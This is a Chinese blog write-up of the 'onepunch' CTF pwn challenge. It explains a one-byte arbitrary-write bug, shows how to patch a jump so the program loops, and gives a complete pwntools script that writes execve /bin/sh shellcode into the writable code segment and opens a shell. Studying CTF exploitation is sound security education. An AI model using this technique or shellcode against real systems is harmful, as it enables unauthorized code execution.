onepunch的wp

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/niexinming/article/details/78542089

https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了onepunch这个题目感觉还不错,我把wp分享出来,方便大家学习
onepunch的题目要求是:

nc hackme.inndy.tw 7718

Punch!

这个题目没有太多提示
下面我用ida打开smashthestack这个程序看main函数
image
这个程序在16行有一个任意地址写的漏洞,程序输入的第一个数字是写入的地址,第二个数字是写入的数,但是这个程序只能写一个字节的数据到指定地址
先运行一下程序看一下这个程序干了啥
image
再看看程序开启了哪些保护:
image
看到NX enabled是开启了栈不可执行,而且这个程序还有canary保护,但是这个程序没有开启地址随机化
用gdb加载一下这个程序
image
用vmmap这个指令可以看到代码段可读写,这个题目一下子就简单了,通过任意地址的写,把shellcode写入内存中,然后执行起来,先看一下汇编代码
image
可以看到在任意地址写这个漏洞之后有个条件跳转(0000000000400767),可以控制这个跳转向上跳转到输入的地方(000000000040072C)从而使这段代码变成一个循环,可以看一下jz short loc_400756对应的字节码是75 0a,75是jnz,0a是跳转的偏移,所以就刚刚好通过第一次写操作把这个0a改掉,所以程序开始时输入400768 -61就可以让这个程序变成一个循环了
image
这样通过这个循环把0000000000400769后面的代码变成shellcode就可以了,关于shellcode,里面不能出现255,如果有255的话,shellcode就会被程序截断,我找了半天,找到一个好用的shellcode:https://www.exploit-db.com/exploits/36858/
这样就可以实现exp了:

#-*- coding: utf-8 -*-
__Auther__ = 'niexinming'

from pwn import *
import binascii
import time
context(terminal = ['gnome-terminal', '-x', 'sh', '-c'], arch = 'amd64', os = 'linux', log_level = 'debug')

def debug(addr = '0x000000000040075d'):
    raw_input('debug:')
    gdb.attach(io, "b *" + addr)



elf = ELF('/home/h11p/hackme/onepunch')
stack_chk_fail=elf.got['__stack_chk_fail']
print "%x" % stack_chk_fail


#shellcode=asm(shellcraft.amd64.linux.sh())
#str_shellcode=str(binascii.b2a_hex(shellcode))
#https://www.exploit-db.com/exploits/36858/
shellcode="\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
addr=0x0400769

#io = process('/home/h11p/hackme/onepunch')

io = remote('hackme.inndy.tw', 7718)

payload1 = '400768'
payload2 = '-61'


#debug()

time.sleep(1)
io.recvuntil('Where What?')
io.sendline(payload1)
io.sendline(payload2)
'''
for i in xrange(0,len(str_shellcode),2):
    io.sendline(hex(addr))
    io.sendline(str(int(str_shellcode[i:i+2],16)))
    addr=addr+0x1
'''


for i in shellcode:
    io.sendline(hex(addr))
    io.sendline(str(ord(i)))
    addr = addr + 0x1
io.sendline('4006f3')
io.sendline(str(255))
#io.recv()
io.interactive()

io.close()

效果是:
image

没有更多推荐了,返回首页